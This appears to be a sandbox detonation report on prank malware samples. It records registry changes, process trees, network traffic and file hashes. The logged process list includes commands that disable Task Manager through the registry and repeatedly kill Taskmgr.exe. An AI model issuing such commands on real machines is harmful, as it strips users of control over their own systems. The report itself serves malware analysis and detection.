| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2DB21D11-D8D4-11EE-83C2-E25BC60B6402} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe"
C:\Users\Admin\AppData\Local\Temp\START.exe
"C:\Users\Admin\AppData\Local\Temp\START.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs"
C:\Users\Admin\AppData\Local\Temp\Killer.exe
"C:\Users\Admin\AppData\Local\Temp\Killer.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZbDz.bat" "
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Collapse_all.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHK.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SHK.bat" "
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
Shaking_horizontally.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Shaking_horizontally.exe /F
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
"C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe"
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
"C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe"
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
"C:\Users\Admin\AppData\Local\Temp\Error_icons.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
"C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe"
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
"C:\Users\Admin\AppData\Local\Temp\New_Names.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://neave.tv/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2576 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
"C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe"
C:\Windows\SysWOW64\regedit.exe
"C:\Windows\System32\regedit.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | neave.tv | udp |
| US | 104.21.234.135:443 | neave.tv | tcp |
| US | 104.21.234.135:443 | neave.tv | tcp |
| US | 8.8.8.8:53 | neave.com | udp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\START.exe
| MD5 | b9e9b7fbd019b7e09e77bdec78ade264 |
| SHA1 | 0cdeda0e10d1f754d2171596d82e97e347089e01 |
| SHA256 | 227e8953a11d22ea948fe3b2426753a435993336ae1f49a6fe3c1dd0b70bf3b7 |
| SHA512 | d2e5dadb63d0ff75e48504720186483877ecde0354fe56d88255a079c116eef5b5c59eaef6ccc99217acce5d5755fd0a50fcf93b115f9408962535a572960a85 |
memory/2804-72-0x0000000002300000-0x000000000231B000-memory.dmp
memory/2804-79-0x0000000002300000-0x000000000231B000-memory.dmp
memory/2452-82-0x0000000000270000-0x000000000028B000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcr100d.dll
| MD5 | 440e9fd9824b8e97d3ca2f34bd1bfbd1 |
| SHA1 | 6852b2c592b3794da114d6ac5ea9d083317bf5af |
| SHA256 | eddaa890ac6470692f76eee9586c06d727a1caf7a242170ab1a3947523927396 |
| SHA512 | b458a0838159367727a63e417bba7c12b196f4d4af56703fe77ddcb2c28c3b6aab1d62335c513398f92c225f204e32b437fb49316b7c2b537c1cf877653c2ef8 |
C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs
| MD5 | 8a25126b21c1f849b719999cb5d85e11 |
| SHA1 | 714fb5a246721c3117868c2229e7598ef7dfb2eb |
| SHA256 | 8ee9f21dd968d66fb71be502c6f2b96f3e0ee1954a4bcf2e7fffa45477fb7f38 |
| SHA512 | 8ea3d56e58410e369c42f6e16381ee802c8df58ee7f60ab937a19417e9a86f6877241ee7472df898bb85765d0bd3a5df2a58f97c717f5da8d32e7c8acf638c84 |
C:\Users\Admin\AppData\Local\Temp\Killer.exe
| MD5 | 32c1a77891071523637345563fcda855 |
| SHA1 | d582fa0290b7c04c99ded56c8ebc6e45df981300 |
| SHA256 | c8cb8941b2ebe27ba69600b8cb5725b9630fb631bd7c7e88dea9eebd8bd3bef3 |
| SHA512 | 61c6e7eddb5d8e880952c0fec6382082cbd33d0463ac556527598aaa6cf9bdb3755f395639d28be1a0cf4efa9f699cfdae06ecb5068b5f43b08b65354580704a |
memory/2452-87-0x0000000001DA0000-0x0000000001DE2000-memory.dmp
memory/840-89-0x0000000000D80000-0x0000000000DC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ZbDz.bat
| MD5 | 90716ec6d805a3e478c0a26477138efd |
| SHA1 | ceae2264e1c3c6a0bf715cf54237c3f763cd5799 |
| SHA256 | f185b92c729b011a051d2d8775eee998da9e71ba6156a8da81b0fc1b25c90a77 |
| SHA512 | fbda3613b691e83299077b1378aa845ab59befd61bc177e54b950f55c857c8e2b208012c026c24489f354c88404172ba25d7584f1b825ccd6880598bcc65cc56 |
C:\Users\Admin\AppData\Local\Temp\Collapse_all.js
| MD5 | f60e1a46f1e7301a7eb36f723cdec4b3 |
| SHA1 | 5e46742927659e3fb0cef6c67542cb5ec2b0926d |
| SHA256 | 5fdab6a87288b929290f603f813a254efa019d8fe6c73d8757ebc543ba6949eb |
| SHA512 | 945f7f053700cf18a80553e09c3d64c8481aeb70d871dd00106bf66fcb33b4360b4412cb4bf9391e4dfd8e6df92d11ffe896bee6f864bdbdddedc1877714ee16 |
C:\Users\Admin\AppData\Local\Temp\SHK.vbs
| MD5 | 2643272752b857cbc69d843d92ff4879 |
| SHA1 | 10f1f87652b5747dd37ed141734e5af39af19ef2 |
| SHA256 | 53c3cd2ed0f6184b2cf0304acfbef726c3415528c903c69a86f3f9405b52179c |
| SHA512 | 3e7d2548ccbe96599b94a585c6a02e2ee2820ac6a8aec1ede270c8089623c3c41fd779fdf5a93b2cd1b9fca3ef2d2b915703f3438c7abd6e27f5a59626f01282 |
C:\Users\Admin\AppData\Local\Temp\SHK.bat
| MD5 | ab921b5b6a2b7232c8d2fd2f0dc78790 |
| SHA1 | fe0c9c4e5255f903bf9b006f27a913f39a115a54 |
| SHA256 | dfd827c3e9bb39c84ca90001a7718c55458145fcf035b4dba1001b201422a8da |
| SHA512 | 47d8ded63fd55f4490d0cd64c8f688fc5bb5814018a09e46f1eae0e36228589f4097f88f2f42e92d02cc068fd3e807aae219a4c4162474a561b3767331e8f98e |
\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
| MD5 | d2404ad25ee623edb58a175d4bb0c7a1 |
| SHA1 | 4ca3589e630abebffe46782f5941f6253001bea9 |
| SHA256 | 35ee2069ddde1c079b1890eafd7041f59eb5170063f3f308b0b808dcc24623ce |
| SHA512 | 26758e01881ccbfa5f124fb8fa15e1712d228ea1aa9e552dd5020436f55e4e83d450128e799aff829e6215eacfcb284133fdf3ca952696cadfe061477b8d0b8c |
memory/2632-97-0x0000000000130000-0x000000000014B000-memory.dmp
memory/2292-101-0x0000000000840000-0x000000000085B000-memory.dmp
memory/2452-99-0x0000000000270000-0x000000000028B000-memory.dmp
memory/2452-102-0x0000000001DA0000-0x0000000001DE2000-memory.dmp
memory/840-103-0x0000000000D80000-0x0000000000DC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
| MD5 | 7c3647e86215919ec06437d9a5fce95d |
| SHA1 | 7bc1a0582e03bd9d7ee5ba1d66268d800d66c596 |
| SHA256 | 39e30df6628702de8a548ff031383c360dfc63a9399169bb93838f7eef57a6ed |
| SHA512 | d0a4991ad1cff73dbd0425e9f7190101f27811daa622c0fa5ba620566a9f95caae4430b0386a6ea9a7575a56931a45ca821f5274f8d2798c73d5154c8fe7e33d |
memory/2452-107-0x0000000000610000-0x000000000062B000-memory.dmp
memory/448-109-0x00000000010E0000-0x00000000010FB000-memory.dmp
memory/2452-110-0x0000000000610000-0x000000000062B000-memory.dmp
\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
| MD5 | 4f5d56501b68860d79846d1c4a567459 |
| SHA1 | 548a514797c85e982a0f636030a18566895efaaa |
| SHA256 | 0df880855797fb52bcaac0e11074869ed409b9daaabfe8939ecd4039962292cd |
| SHA512 | 5efc549dcef528f0f5b09758ce18686106781788c0e78467d02fb12b7b138c0ca301d68e81305e7053f5471fa6c9c192d6bad81067fe70803e237b8dbf7d1f41 |
memory/2452-114-0x0000000000610000-0x000000000062B000-memory.dmp
memory/620-116-0x0000000001060000-0x000000000107B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
| MD5 | d9c07b7bc1a4df56ecb73941aafa2d78 |
| SHA1 | 9d64ca9262852e3ee4b5e098e2762401364e80e8 |
| SHA256 | 506b80e8f8551e29fa1e93082fefc99ce6613ad7abae895d61bdda92f4dce8c3 |
| SHA512 | ca282eedf7851df48e0ae001684ca4400b6a43e14893610972496e7c4c7002c508b95278896176ef4d49d371d95b6cc759609313a833bcdbc010a064cb28170f |
memory/2452-120-0x0000000000610000-0x000000000062B000-memory.dmp
memory/664-122-0x0000000001080000-0x000000000109B000-memory.dmp
memory/2452-123-0x0000000000610000-0x000000000062B000-memory.dmp
memory/620-124-0x0000000001060000-0x000000000107B000-memory.dmp
memory/2452-125-0x0000000000610000-0x000000000062B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
| MD5 | 7cfd733ea3aedb94f04013881f8a9f14 |
| SHA1 | 94642432fd416ec32f1cd17dfd9b23922432dcea |
| SHA256 | fceb50190c036057c6386387ed115b83a9fec153332b80be4d891cb9ef8f624a |
| SHA512 | 8c2b83a6aa96bed630e950cb66cd3a50e4789f303b9f2f3f2f6043f16a3a26d7dc9a56aa43cb3af0e548b207d5a228b88eaacb0b1872fc8abd4e1191f465e323 |
memory/2452-130-0x00000000001F0000-0x000000000020B000-memory.dmp
memory/3000-131-0x0000000000E70000-0x0000000000E8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
| MD5 | dd799cfa99ea38299f32a744b4a9864c |
| SHA1 | 850457eea90f64bb760d078008f17799f8eb4843 |
| SHA256 | f9f469026252b2c7084755430c9b0d8939a8547b23a5bb32371102d7a3578ed1 |
| SHA512 | 9c74976ea217276bf5b291d629aa21ace989a45697748cb449eeba8d8c846e77e7ab66c1b701243ceb207db364d1abc376950c6b5f4cb92db068922ae41dcef3 |
memory/2832-136-0x0000000000320000-0x0000000000321000-memory.dmp
memory/2832-137-0x0000000000400000-0x0000000000468000-memory.dmp
memory/2452-138-0x00000000001F0000-0x000000000020B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8ADCJI8Z\icon-32[1].png
| MD5 | 161e12c343ad30aee3bfac354658e4f1 |
| SHA1 | 2951751e5f6f01e237dc0565d41c35d7040a29ce |
| SHA256 | 270582c227f5a93d8ff4a659a0075ea2af8952f0f73d24ba4d8c6a512a6465bf |
| SHA512 | e14f4b34b1d7f85b8a8674e0c9c87a9318de70fbb2aa46f0eecb7a033cdd84770d1afc3fc891482a278254ec671db8a7faf18c181b2a7aba034148b9460fec33 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\3pl5scb\imagestore.dat
| MD5 | 2d59812bd22138c95e1a86a61d46e5ae |
| SHA1 | bafec6bdfbff08d61a09f096df4b07d1aa58fce3 |
| SHA256 | 7ed1a5b247df580d06efbc9f7c9e7577f7dadfcca81f179ad8f8b358c6f66fb0 |
| SHA512 | 506ee57bf2c6326cb8ba1a1021b3366d219543df13ecdbc4d0b4d8f0c5be46225c66eaf8413d055a645babaeb17aa249c3278cf8b49128dd81c69aef39abdb4d |
C:\Users\Admin\AppData\Local\Temp\Tar7524.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Temp\Cab7521.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 17dabc8408bbc690943f932394ff9ecb |
| SHA1 | 20887b99f05f4489036827176631117894f3ae5d |
| SHA256 | b7dd6529ed59f3e9930b89375aac9aa32c64936b37abb3c7467cb4ca80a20ca6 |
| SHA512 | 3c5c16ba760fa717c686a30c618e3ca34285065da75b5255e6a3de8316396b22ed2d77d388623223a5fd82f262f78ae1495e4896c6685fa32d81fafccb3d6ca7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar7662.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fd05cf6cf5b14d5874b2184097ca99bf |
| SHA1 | 2979f669088da868602bf5d474c7d12b4f1729d8 |
| SHA256 | 577c6371fd783e78a82e5f5581b61ea98fd52b65c2a01ac557be9c690c5e66b3 |
| SHA512 | aa7e7cf2bedd3685a31ce7596a747fe08b9edccdc4ac85b21f923e9ceeb03274f61a8ac8a04cb18f03a0fd84fcdb6107771adedb7379d976b71abf98fd72f187 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | df4154af4451615fed7dc3f5ea1bd0fe |
| SHA1 | b8efd3bc6f5c77731abca5d447b63957bb930e54 |
| SHA256 | 2d431860517211ff3db9b940e954ad4b02ba2be21f5b41e9991ed2145c3737cb |
| SHA512 | 070bb9e1b77466dd2deff32c78af73c9d25f45e9ced070bf75436204ec517711c37b90f1d64c29b2cf96210b0e387428adfa15a6913359893dc4d4fda4b917a9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1895f8ccf169e9111b5494ff871c240d |
| SHA1 | 400cc5b342b8bb47c2a1276bca1687c8bfd5a720 |
| SHA256 | 7d705cb0a3bc83bc3a35edddf8e0b4cde2c0431fae40582ecfdc81685238f89e |
| SHA512 | 26ba75157584ab5664dc6222c3153601cee39d15b8e4a0db724e3d1a851c0f53f49d3130f87443e27c1ab9e0c6475b678e527ae86b729ff69314e26e8bc8dbde |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a7fd5b331c4127ce292405a22e5cc69c |
| SHA1 | 4621909193dbe4fc8f2d57de381f8d02c6e4a1e3 |
| SHA256 | d378f3cb73a92fa57532b771d0839a6d3cfd21be1e33d0a152841c1e637b7b79 |
| SHA512 | 1c26168e3c3c4dc2820e06976323d18bf5f7e186daa6ce5257c24ccc7661aa3fb27af04f1539ca34d949931394770c8128450536e868254842cad3341a69e4a2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e520369a3faea274df9586f9e4f7036 |
| SHA1 | 2f8163893f6bb46de54e102d49e21f454f015274 |
| SHA256 | bfeb219b36522872b66dee4a6c8f433536b9162d51432d41155371ea3feb62a7 |
| SHA512 | 5c458b0ab4cf578ccf7f402d97da9307afcf9b8ea4dc2b59d1dca9b23b303c6ad4a96012236fd76efcb64f1ffd54a247e600ba37700559e5283a8f400947d160 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 42b0a82735dfb2391168a5a386bb1020 |
| SHA1 | 4734858a964272de6623581156e32ffc1fb97961 |
| SHA256 | 40ec337e8776506fb4808db2c3b64a128bea3c0510bf3c9d8fa65b21134e20d2 |
| SHA512 | 97d6804eabc875fb676e3e48608563eb715abb21ca00a272bd8985407d8712ec7333b527f936d97ec3f1f5afdb38ddea21d06f197f2968d8281653b9c1a1c308 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f8c5c68cf8ae6c4ece3d970702788390 |
| SHA1 | e01b2e8c14daf8b8976d21a3464dbc3285908a34 |
| SHA256 | 8fecc21b7d4425ed4589941118473489072167b751dde8e06524f6e63122ffa6 |
| SHA512 | 6fd4d85be61437a443adbbc4191707a1f0efa50217f465f6059e5149361b4e86c322d455572bc24c59bc3100050801cc9e0cb8e82f8dbd7d8fa9be748ac4a02a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bab66cc84696e571760552c47eac63e1 |
| SHA1 | 31fe1b2cede624d432c7c24c538d8333199a845f |
| SHA256 | 3da9aa3bc766280d87b95b646d22a883f1debcd0f9194e7f2529d8df20391be6 |
| SHA512 | 000781e326c65d76643730adf46b43d016755fda34dfdfbf33fa4cfc38d0e20bc412c5671c87acc7f9171c81fbc47be70f69be35c8154ce7d68ff6029969058b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a49c611a8ee9e98b5d2577b12b04fda2 |
| SHA1 | b72a54c186b97739ea8d2842c995db8f0fd294e5 |
| SHA256 | 80fe5beac9e9b621445d3d36e7208ef2c0a8a2b493753c7705e3be70cc5f6c93 |
| SHA512 | bac584865b17c203edb57165ecd86bda530f279422d71b304f63d592815299c675e30f2108ad2193f3e8c7ccd092ad90eae45dafa107fcf08ec215519889c737 |
memory/2832-667-0x0000000000400000-0x0000000000468000-memory.dmp
memory/2452-668-0x00000000001F0000-0x000000000020B000-memory.dmp
memory/2716-669-0x00000000000B0000-0x00000000000CB000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
132s
Max time network
60s
Command Line
Signatures
Disables Task Manager via registry modification
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\system32\cmd.exe | N/A |
